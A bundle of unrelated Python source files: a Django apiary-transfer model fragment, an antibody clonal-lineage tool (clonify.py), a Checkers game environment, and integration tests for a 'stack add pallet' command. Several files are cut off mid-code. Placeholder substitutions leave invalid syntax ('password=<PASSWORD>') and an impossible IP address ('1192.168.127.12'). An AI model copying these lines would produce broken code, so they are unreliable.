# transferee used to store EmailUser without existing licence
transferee = models.ForeignKey(EmailUser, blank=True, null=True, related_name='apiary_transferee')
transferee_email_text = models.CharField(max_length=200, null=True)
originating_approval = models.ForeignKey('disturbance.Approval', blank=True, null=True, related_name="site_transfer_originating_approval")
target_approval = models.ForeignKey('disturbance.Approval', blank=True, null=True, related_name="site_transfer_target_approval")
target_approval_organisation = models.ForeignKey(Organisation, blank=True, null=True)
target_approval_start_date = models.DateField(blank=True, null=True)
target_approval_expiry_date = models.DateField(blank=True, null=True)
reissue_originating_approval = models.BooleanField(default=False)
reissue_target_approval = models.BooleanField(default=False)
apiary_sites = models.ManyToManyField('ApiarySite', through=ApiarySiteOnProposal, related_name='proposal_apiary_set')
#self_clone = models.ForeignKey('self', on_delete=models.SET_NULL, blank=True, null=True)
public_liability_insurance_expiry_date = models.DateField(null=True, blank=True)
def __str__(self):
return 'id:{} - {}'.format(self.id, self.title)
class Meta:
app_label = 'disturbance'
def validate_apiary_sites(self, raise_exception=False):
validity = True
# Check if the site has been already taken by someone else
for apiary_site in self.apiary_sites.all():
if apiary_site.is_vacant:
# The site is 'vacant'
others = ApiarySiteOnProposal.objects.filter(Q(apiary_site=apiary_site), (Q(making_payment=True) | Q(site_status=SITE_STATUS_PENDING))).exclude(proposal_apiary=self)
if others:
# Someone has been making payment for this apiary site
validity = False
else:
# The site is not 'vacant'
relation = self.get_relation(apiary_site)
if relation != apiary_site.latest_proposal_link:
validity = False
if not validity and raise_exception:
# raise ValidationError(message='The vacant apiary site: {} is | |
#!/usr/local/bin/python
# filename: clonify.py
#
# Copyright (c) 2015 <NAME>
# License: The MIT license (http://opensource.org/licenses/MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import argparse
# import celery
from collections import OrderedDict
import json
import math
import multiprocessing as mp
import os
import sqlite3
import subprocess as sp
import sys
import tempfile
import time
import traceback
import urllib.request, urllib.parse, urllib.error
from abutils.utils import log, mongodb, progbar
from abutils.utils.pipeline import make_dir
# from abtools.queue.celery import celery
from .utils import cluster
from .utils.cluster import Cluster, Clusters
from .utils.database import Database
if sys.version_info[0] > 2:
import pickle
else:
import cPickle as pickle
def parse_args():
parser = argparse.ArgumentParser("")
parser.add_argument('-d', '--db', dest='db', required=True,
help="The MongoDB database to be queried. Required.")
parser.add_argument('-c', '--collection', dest='collection', default=None,
help="The MongoDB collection to be queried. \
If ommitted, sequences from all collections in the database will be processed.")
parser.add_argument('--collection-prefix', dest='collection_prefix', default=None,
help="If supplied, Clonify will process only collections beginning with <collection_prefix>.")
parser.add_argument('--collection-prefix-split', default=None,
help="If supplied, will split all collection names at the <split-num> occurance of the supplied string \
and group all collections with identical prefixes. --pool=True is implied with this option.")
parser.add_argument('--collection-prefix-split-pos', default=0, type=int,
help="If supplied, will group all collections that are identical for the first <collection-prefix-split-pos> \
characters. --pool=True is implied with this option.")
parser.add_argument('--split-num', default=1, type=int,
help="With <collection-prefix-split>, collection names will be split at the <split-num> occurance of \
<collection-prefix-split>. Uses 1-based indexing. Default is 1.")
parser.add_argument('--pool', dest='pool', default=False, action='store_true',
help="If set, all collections will be pooled and processed as a single group.")
parser.add_argument('-i', '--ip', dest='ip', default='localhost',
help="The IP address of the MongoDB server. Defaults to 'localhost'.")
parser.add_argument('-P', '--port', dest='port', default=27017, type=int,
help="The port used to connect to the MongoDB server. Defaults to '27017'.")
parser.add_argument('-u', '--user', dest='user', default=None,
help="Username for the MongoDB server. Not used if not provided.")
parser.add_argument('-p', '--password', dest='password', default=None,
help="Password for the MongoDB server. Not used if not provided.")
parser.add_argument('-o', '--out', dest='output', default='',
help="Directory for the output files. Files will be named '<collection>_clones.txt'. \
Failing to provide an output directory will result in no output files being written.")
parser.add_argument('-t', '--temp', dest='temp', default='/tmp',
help="The directory in which temp files will be stored. \
If the directory doesn't exist, it will be created. Default is '/tmp'.")
parser.add_argument('-l', '--log', dest='logfile',
help="Path to the log file. Required.")
parser.add_argument('--non-redundant', default=False,
help="Collapses identical sequences prior to running Clonify. \
Stores redundant sequence info so that the complete redundant Mongo database will be \
updated with lineage info (non-redunant sequences are re-expanded prior to database update). \
Options are 'nt' or 'aa', which collapse identical nucleotide or amino acid sequences, respectively. \
Best for collections that contain redundant sequences \
and are large enough to cause clonify segfaults.")
parser.add_argument('--clustering-threshold', default=1.0, type=float,
help="Clustering threshold to be used with the --non-redundant option. \
Default is 1.0.")
# The following option ('-x') doesn't do anything at the moment.
parser.add_argument('-x', '--dist', dest='distance_cutoff', default=0.35, type=float,
help="NOT YET IMPLEMENTED. The cutoff adjusted edit distance (aED) for segregating \
sequences into clonal families. Defaults to 0.35.")
parser.add_argument('-C', '--celery', dest="celery", default=False, action='store_true',
help="NOT YET IMPLEMENTED. Use if performing computation on a Celery cluster. \
If set, input files will be split into many subfiles and passed \
to a Celery queue. If not set, input files will still be split, but \
will be distributed to local processors using multiprocessing.")
parser.add_argument('-w', '--num-map-workers', dest='num_map_workers', type=int, default=1,
help='The number of map process that will be spawned. Default is 1. \
Set to 0 to use the max number of available cores, whether on a local \
machine using multiprocessing or on a Celery cluster.')
parser.add_argument('-n', '--no_update', dest='update', action='store_false', default=True,
help="Use to skip updating the MongoDB database with clonality info.")
parser.add_argument('--test-algo', action='store_true', default=False,
help='Tests whether the cluster program works. Useful for troubleshooting.')
parser.add_argument('-D', '--debug', dest='debug', action='store_true', default=False,
help="If set, will run in debug mode.")
return parser.parse_args()
class Args(object):
"""docstring for Args"""
def __init__(self, db=None, collection=None,
collection_prefix=None, collection_prefix_split=None, collection_prefix_split_pos=0,
split_num=1, pool=False, ip='localhost', port=27017, user=None, password=<PASSWORD>,
output='', temp=None, log=None, non_redundant=False, clustering_threshold=1.0,
distance_cutoff=0.35, celery=False, update=True, debug=False):
super(Args, self).__init__()
if any([db is None, temp is None, logfile is None]):
print('ERROR: the following options are required:')
print('--db, --temp, --log')
sys.exit(1)
self.db = db
self.collection = collection
self.collection_prefix = collection_prefix
self.collection_prefix_split = collection_prefix_split
self.collection_prefix_split_pos = int(collection_prefix_split_pos)
self.split_num = int(split_num)
self.pool = pool
self.ip = ip
self.port = int(port)
self.user = user
self.password = password
self.output = output
self.temp = temp
self.logfile = log
self.non_redundant = non_redundant
self.clustering_threshold = clustering_threshold
self.distance_cutoff = float(distance_cutoff)
self.celery = celery
self.update = update
self.debug = debug
def validate_args(args):
for d in [args.output, args.temp]:
if d is not None:
make_dir(d)
################################
#
# MONGO
#
################################
def get_collection_groups(args):
if args.collection:
if os.path.isfile(args.collection):
colls = []
with open(args.collection) as f:
for line in f:
colls.append(line.strip())
if args.pool:
return [sorted(colls), ]
return [[c, ] for c in sorted(colls)]
else:
return [[args.collection, ], ]
all_collections = db.collection_names(include_system_collections=False)
if args.collection_prefix:
prefix_collections = [c for c in all_collections if c.startswith(args.collection_prefix)]
if args.pool:
return [sorted(prefix_collections), ]
return [[c, ] for c in sorted(prefix_collections)]
if args.collection_prefix_split:
args.pool = True
s = args.collection_prefix_split
prefix_collections = []
prefixes = sorted(list(set(
[s.join(c.split(s)[:args.split_num]) for c in all_collections])))
for p in prefixes:
prefix_collections.append(sorted([c for c in all_collections if c.startswith(p)]))
return prefix_collections
if args.collection_prefix_split_pos:
args.pool = True
pos = args.collection_prefix_split_pos
prefix_collections = []
prefixes = sorted(list(set([c[:pos] for c in all_collections])))
for p in prefixes:
prefix_collections.append(sorted([c for c in all_collections if c.startswith(p)]))
return prefix_collections
if args.pool:
return [sorted(all_collections), ]
return [[c, ] for c in sorted(all_collections)]
def get_collections(args):
if args.collection:
if os.path.isfile(args.collection):
colls = []
with open(args.collection) as f:
for line in f:
colls.append(line.strip())
return sorted(colls)
else:
return [args.collection, ]
collections = db.collection_names(include_system_collections=False)
if args.collection_prefix:
collections = [c for c in collections if c.startswith(args.collection_prefix)]
return sorted(collections)
def query(collection, args):
c = db[collection]
# vdj_query = 'vdj_nt' if args.non_redundant == 'nt' else 'vdj_aa'
results = c.find({'chain': 'heavy', 'prod': 'yes', 'cdr3_len': {'$gte': 2}},
{'_id': 0, 'seq_id': 1, 'v_gene.full': 1, 'j_gene.full': 1, 'junc_aa': 1,
'vdj_nt': 1, 'vdj_aa': 1, 'var_muts_nt': 1})
return [r for r in results]
def ensure_index(field, group):
logger.info('\nEnsuring indexes prior to updating:')
for collection in group:
logger.info("Indexing '{}' on {}...".format(field, collection))
coll = db[collection]
coll.ensure_index(field)
def update_db(clusters, group):
print_update_info()
start = time.time()
sizes = []
p = mp.Pool(processes=250)
async_results = []
for c in clusters:
sizes.append(c.size)
async_results.append(p.apply_async(update, args=(c, group)))
monitor_update(async_results)
p.close()
p.join()
seq_count = sum(sizes)
run_time = time.time() - start
logger.info('Updating took {} seconds. ({} sequences per second)'.format(round(run_time, 2), round(seq_count / run_time, 1)))
return sizes
def update(clust, group):
for collection in group:
c = db[collection]
c.update_many({'seq_id': {'$in': clust.seq_ids}},
{'$set': {'clonify': {'id': clust.name, 'size': clust.size}}})
def get_sequences(collection_group, args):
seqs = []
if args.non_redundant:
from .utils import nr
nr_db = nr.make_nr_seq_db(args)
for collection in collection_group:
print_collection_info(collection)
coll_seqs = query(collection, args)
nr_coll_seqs = nr.make_nr(coll_seqs, nr_db, args)
seqs += nr_coll_seqs
print_query_info(coll_seqs, nr=nr_coll_seqs)
else:
for collection in collection_group:
print_collection_info(collection)
coll_seqs = query(collection, args)
seqs += coll_seqs
print_query_info(coll_seqs)
return seqs
################################
#
# SQLITE
#
################################
def build_json_db(seq_ids, json_files, args):
logger.info('')
logger.info('Building a database of JSON files...')
jsondb = Database('json_db', args.temp)
jsondb.insert_many(list(zip(json_files, seq_ids)))
# for j, s in zip(json_files, seq_ids):
# jsondb[j] = s
jsondb.commit()
logger.info('Indexing...')
jsondb.index()
jsondb.close()
return jsondb
def build_mr_db(sequences, args):
logger.info('')
logger.info('Building a database of sequences...')
# hackety hackerson to pickle the JSON data into | |
<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
###############################################################################
# Checkers.py
#
# Revision: 1.00
# Date: 11/11/2020
# Author: Alex
#
# Purpose: Contains all functions necessary to implement the Checkers
# game environment.
#
# Notes:
# 1. Run this module to see a demonstration game of Checkers.
# 2. Rules are according to the World Checkers Draughts Federation (WCDF).
# 3. https://www.wcdf.net/rules.htm
#
###############################################################################
"""
import numpy as np
from copy import deepcopy
from tabulate import tabulate
import time
class Checkers:
"""Class to represent a game of Checkers."""
def __init__(self, neural_net=None):
"""Initialize the class with the pieces in their starting positions.
Get a list of valid (legal) next moves. Moves are not explicitly
represented; instead possible next states of the game board are
generated. The player's move is implied by selecting one of these
possible next states.
The game state is a 3 dimensional NumPy array of 15 8x8 arrays.
These 8x8 arrays represent the 8x8 game board, where:
0. Array 0 represents the locations of player 1's uncrowned men.
1. Array 1 represents the locations of player 1's kings.
2. Array 2 represents the locations of player 2's uncrowned men.
3. Array 3 represents the locations of player 2's kings.
4. Array 4 indicates the current player (all 0s for P1, all 1s for P2)
5. Array 5 is the draw timer; counts in increments of 1/80
6. Arrays 6, 7, 8, 9 are normal moves (UL, UR, BL, BR)
7. Arrays 10, 11, 12, 13 are jumps (UL, UR, BL, BR)
8. Array 14 contains the indices of the parent state's action
"""
self.state = np.zeros((15,8,8), dtype=float)
self.init_board()
self.history = [self.state]
self.legal_next_states = self.get_legal_next_states(self.history)
self.move_count = 0
self.done = False
self.outcome = None
self.player1_man = 'x'
self.player1_king = u'\u0416'
self.player2_man = 'o'
self.player2_king = u'\u01D1'
self.neural_net = neural_net
def step(self, next_state):
"""Execute the player's (legal) move. Check to see if the game
has ended, and update the list of legal next moves.
"""
if any((next_state[:5] == x[:5]).all() for x in self.legal_next_states):
self.state = next_state
self.history.append(self.state)
self.legal_next_states = self._check_moves(self.history)
self.done, self.outcome = self.determine_outcome(self.history,
legal_moves=self.legal_next_states)
self.move_count += 1
return self.state, self.outcome, self.done
else:
raise ValueError('Illegal next state (invalid move)!')
def get_legal_next_states(self, history):
"""If the game is not done, return a list of legal next moves given
a history of moves as input. The next moves are actually board states;
the move to achieve those states is implied.
This function calls determine_outcome() which also must check
the legal next states in order to determine the outcome of the game.
Redundant computation can be avoided by checking the legal next states
here first and then passing them as an optional argument to
determine_outcome().
"""
legal_next_states = self._check_moves(history)
done, outcome = self.determine_outcome(history,
legal_moves=legal_next_states)
if done == True: return [] # Game over
return legal_next_states
def _check_moves(self, history):
"""Method intended for internal use. Creates a list of the locations
of all of the pieces on the board divided up into four categories (P1's
men, P1's kings, P2's men, and P2's kings).
Checks for all possible ordinary moves of men and kings for the current
player only. Calls two other internal methods, _check_jumps()
and _check_king_jumps() to determine if there are jumps possible for
the player's men and kings, respectively. Per the rules jumps are
mandatory moves, and so if jump moves exist they are returned by the
function instead of the ordinary moves.
The function also determines if an ordinary move results in a man
reaching King's Row, and kings the man if so.
"""
state = history[-1]
player = int(state[4,0,0])
xman1, yman1 = np.where(state[0] == 1) # Locations of P1's men
xking1, yking1 = np.where(state[1] == 1) # Locations of P1's kings
xman2, yman2 = np.where(state[2] == 1) # Locations of P2's men
xking2, yking2 = np.where(state[3] == 1) # Locations of P2's kings
piece_locs = [np.column_stack((xman1, yman1)), np.column_stack((xking1, yking1)),
np.column_stack((xman2, yman2)), np.column_stack((xking2, yking2))]
board = np.sum(state[0:4], axis=0) # All pieces on one 8x8 grid
idx = player * 2 # State index of player's pieces
opp_idx = 0 if idx else 2 # State index of opponent's pieces
fwd = 1 if player == 0 else -1 # Sets forward direction of player's men
legal_moves = []
jump_moves = []
# Get legal moves including jumps for men
for x, y in piece_locs[idx]: # Men
if y+1 < 8 and -1 < x+fwd < 8:
if board[x+fwd,y+1] == 0: # Diagonal-right space open
temp_state = deepcopy(state)
temp_state[5:] = 0 # Erase NN layers from previous state
temp_state[4] = 1 - player # Toggle player
temp_state[idx,x,y] = 0 # Piece no longer in prev location
if (fwd == 1 and x+fwd == 7) or \
(fwd == -1 and x+fwd == 0): # On King's row, king the man
temp_state[idx+1,x+fwd,y+1] = 1
else: # Not on King's row, man does not become king
temp_state[idx,x+fwd,y+1] = 1
if fwd == 1:
state[9,x,y] = 1 # NN layer representing BR move
temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
9, x, y
else:
state[7,x,y] = 1 # NN layer representing UR move
temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
7, x, y
legal_moves.append(temp_state)
if y-1 > -1 and -1 < x+fwd < 8:
if board[x+fwd,y-1] == 0: # Diagonal-left space open
temp_state = deepcopy(state)
temp_state[5:] = 0 # Erase NN layers from previous state
temp_state[4] = 1 - player # Toggle player
temp_state[idx,x,y] = 0 # Piece no longer in prev location
if (fwd == 1 and x+fwd == 7) or \
(fwd == -1 and x+fwd == 0): # On King's row, king the man
temp_state[idx+1,x+fwd,y-1] = 1
else: # Not on King's row, man does not become king
temp_state[idx,x+fwd,y-1] = 1
if fwd == 1:
state[8,x,y] = 1 # NN layer representing BL move
temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
8, x, y
else:
state[6,x,y] = 1 # NN layer representing UL move
temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
6, x, y
legal_moves.append(temp_state)
# Check to see if man can jump any of opponent's pieces
jump_moves.extend(self._check_jumps(x,y,fwd,state,idx,opp_idx,board,player))
# Get legal moves including jumps for kings
for x, y in piece_locs[idx+1]: # Kings
for xmove in range(-1,2,2):
for ymove in range(-1,2,2):
if -1 < x+xmove < 8 and -1 < y+ymove < 8:
if board[x+xmove,y+ymove] == 0: # Diag space open
temp_state = deepcopy(state)
temp_state[5:] = 0 # Erase NN layers from previous state
temp_state[4] = 1 - player # Toggle player
temp_state[idx+1,x,y] = 0 # Piece no longer in prev location
temp_state[idx+1,x+xmove,y+ymove] = 1
if xmove == 1 and ymove == 1:
state[9,x,y] = 1 # NN layer representing BR move
temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
9, x, y
elif xmove == 1 and ymove == -1:
state[8,x,y] = 1 # NN layer representing BL move
temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
8, x, y
elif xmove == -1 and ymove == 1:
state[7,x,y] = 1 # NN layer representing UR move
temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
7, x, y
elif xmove == -1 and ymove == -1:
state[6,x,y] = 1 # NN layer representing UL move
temp_state[14,0,0], temp_state[14,0,1], temp_state[14,0,2] = \
6, x, y
legal_moves.append(temp_state)
# Check to see if king can jump any of opponent's pieces
jump_moves.extend(self._check_king_jumps(x,y,state,idx,opp_idx,board,player))
if jump_moves:
state[6:10] = 0 # Clear all possible non-jump moves
return jump_moves # Jumps are mandatory
return legal_moves
def _check_jumps(self,x,y,fwd,state,idx,opp_idx,board,player):
"""Method intended for internal use. Checks to see if a jump is
possible for a man given its position and the game state. Function
recursively calls itself in case multiple jumps are possible in the
same turn. All jumps are mandatory moves, so a double jump takes
precedence over a single jump, a triple jump over a double jump, etc.
If a jump lands a man on King's row, the man is | |
<filename>test-framework/test-suites/integration/tests/add/test_add_pallet.py
import json
from operator import itemgetter
from contextlib import ExitStack
from textwrap import dedent
class TestAddPallet:
def test_no_pallet(self, host):
# Call add pallet with nothing mounted and no pallets passed in
result = host.run('stack add pallet')
assert result.rc == 255
assert result.stderr == 'error - no pallets specified and /mnt/cdrom is unmounted\n'
def test_invalid(self, host):
# Add something that doesn't exist
result = host.run('stack add pallet /export/test.iso')
assert result.rc == 255
assert result.stderr == 'error - The following arguments appear to be local paths that do not exist: /export/test.iso\n'
def test_username_no_password(self, host, create_pallet_isos):
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso username=test')
assert result.rc == 255
assert result.stderr == dedent('''\
error - must supply a password along with the username
[pallet ...] [checksum=string] [clean=bool] [dir=string] [password=string] [run_hooks=bool] [updatedb=string] [username=string]
''')
def test_password_no_username(self, host, create_pallet_isos):
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso password=<PASSWORD>')
assert result.rc == 255
assert result.stderr == dedent('''\
error - must supply a password along with the username
[pallet ...] [checksum=string] [clean=bool] [dir=string] [password=string] [run_hooks=bool] [updatedb=string] [username=string]
''')
def test_minimal(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
# Add our minimal pallet
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'pallet': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles'
}
]
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_multiple_isos(self, host, host_os, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
# Add our minimal pallet
minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
other_iso = f'{create_pallet_isos}/test-different-arch-1.0-prod.arm.disk1.iso'
result = host.run(f'stack add pallet {minimal} {other_iso}')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal test-different-arch output-format=json')
assert result.rc == 0
assert sorted(json.loads(result.stdout), key=itemgetter('name')) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
},
{
'arch': 'arm',
'boxes': '',
'name': 'test-different-arch',
'os': 'sles',
'release': 'prod',
'version': '1.0'
}
]
def test_no_mountpoint(self, host, rmtree, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
# Remove our mountpoint
rmtree('/mnt/cdrom')
# Add our minimal pallet
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_mountpoint_in_use(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
''' current code should not care about double mounted iso's, or anything mounted in /mnt/cdrom '''
# Mount an ISO to simulate something left mounted
with ExitStack() as cleanup:
result = host.run(f'mount {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso /mnt/cdrom')
assert result.rc == 0
#Unmount the iso no matter what happens after test exits
cleanup.callback(host.run, 'umount /mnt/cdrom')
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_mountpoint_in_use_mnt(self, host, create_blank_iso, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
with ExitStack() as cleanup:
# Mount an ISO to simulate another iso left mounted in /mnt
result = host.run(f'mount {create_blank_iso}/blank.iso /mnt')
assert result.rc == 0
#Unmount the iso no matter what happens after test exits
cleanup.callback(host.run, 'umount /mnt')
# Add our minimal pallet
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_mounted_cdrom(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
with ExitStack() as cleanup:
# Mount our pallet
result = host.run(f'mount | grep /mnt/cdrom')
print(result)
result = host.run(f'mount --read-only {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso /mnt/cdrom')
assert result.rc == 0
cleanup.callback(host.run, 'umount /mnt/cdrom')
# Add our minimal pallet that is already mounted
result = host.run('stack add pallet')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_duplicate(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
# Add our minimal pallet
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
# Add our minimal pallet again
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
# Adding the same pallet multiple times should only result in a
# single pallet in the database
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_pallet_already_mounted(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
''' shouldn't matter if an iso is mounted elsewhere, we should still be able to add it as a pallet '''
with ExitStack() as cleanup:
# Mount our pallet
result = host.run(f'mount | grep /mnt/cdrom')
print(result)
result = host.run(f'mount --read-only {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso /mnt/cdrom')
assert result.rc == 0
cleanup.callback(host.run, 'umount /mnt/cdrom')
# Unmount ISO
result = host.run(f'umount /mnt/cdrom')
assert result.rc == 0
# Add our minimal pallet that is already mounted
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_disk_pallet(self, host, test_file, revert_export_stack_pallets):
# Add the minimal pallet from the disk
result = host.run(f'stack add pallet {test_file("pallets/minimal")}')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_network_iso(self, host, run_pallet_isos_server, revert_export_stack_pallets, revert_pallet_hooks):
# Add the minimal pallet ISO from the network
result = host.run('stack add pallet http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'pallet': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles'
}
]
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_network_directory(self, host, run_file_server, revert_export_stack_pallets):
# Add the minimal pallet directory from the network
result = host.run('stack add pallet http://127.0.0.1:8000/pallets/minimal/1.0/sles12/sles/x86_64')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_network_directory_with_extra_slash(self, host, run_file_server, revert_export_stack_pallets):
''' add pallet should clean up the extra slash - this was a bug we found in stackios :( '''
# Add the minimal pallet directory from the network
result = host.run('stack add pallet http://127.0.0.1:8000/pallets//minimal/1.0/sles12/sles/x86_64')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
def test_failed_download(self, host, run_file_server):
result = host.run('stack add pallet http://127.0.0.1:8000/test.iso')
assert result.rc == 255
assert result.stderr.startswith('error - ')
assert result.stderr.endswith('404 - Not Found\n')
def test_invalid_iso(self, host, create_blank_iso):
result = host.run(f'stack add pallet {create_blank_iso}/blank.iso')
#Make ISO unmounted, not just deleted
assert result.rc == 255
assert result.stderr.startswith(f'error - The following arguments do not appear to be pallets: {create_blank_iso}/blank.iso')
def test_jumbo_pallet(self, host, test_file, revert_export_stack_pallets):
print(f'stack add pallet {test_file("pallets/jumbo/")}')
result = host.run(f'stack add pallet {test_file("pallets/jumbo/")}')
assert result.rc == 0
# Check it made it in as expected
result = host.run('stack list pallet minimal maximal output-format=json')
assert result.rc == 0
assert sorted(json.loads(result.stdout), key=itemgetter('name')) == [
{
'name': 'maximal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
},
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
},
]
def test_add_pallet_updates_url(self, host, run_pallet_isos_server, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
# Add our minimal pallet
result = host.run(f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
result = host.run('stack list pallet minimal expanded=true output-format=json')
assert result.rc == 0
# Make sure we have the expected local path
result_json = json.loads(result.stdout)
assert result_json[0]['url'].startswith("/tmp/")
del result_json[0]['url']
assert result_json == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': ''
}
]
# Now add it from with a URL, and see that the url field is updated
result = host.run('stack add pallet http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
# Check it made it in as expected, and the url is updated
result = host.run('stack list pallet minimal expanded=true output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'name': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles',
'boxes': '',
'url': 'http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso'
}
]
def test_add_pallet_output_wsclient(self, host, run_pallet_isos_server, revert_export_stack_pallets, revert_pallet_hooks):
# Add the minimal pallet ISO from the network
result = host.run('wsclient add pallet http://1192.168.127.12:8000/minimal-1.0-sles12.x86_64.disk1.iso')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'pallet': 'minimal',
'version': '1.0',
'release': 'sles12',
'arch': 'x86_64',
'os': 'sles'
}
]
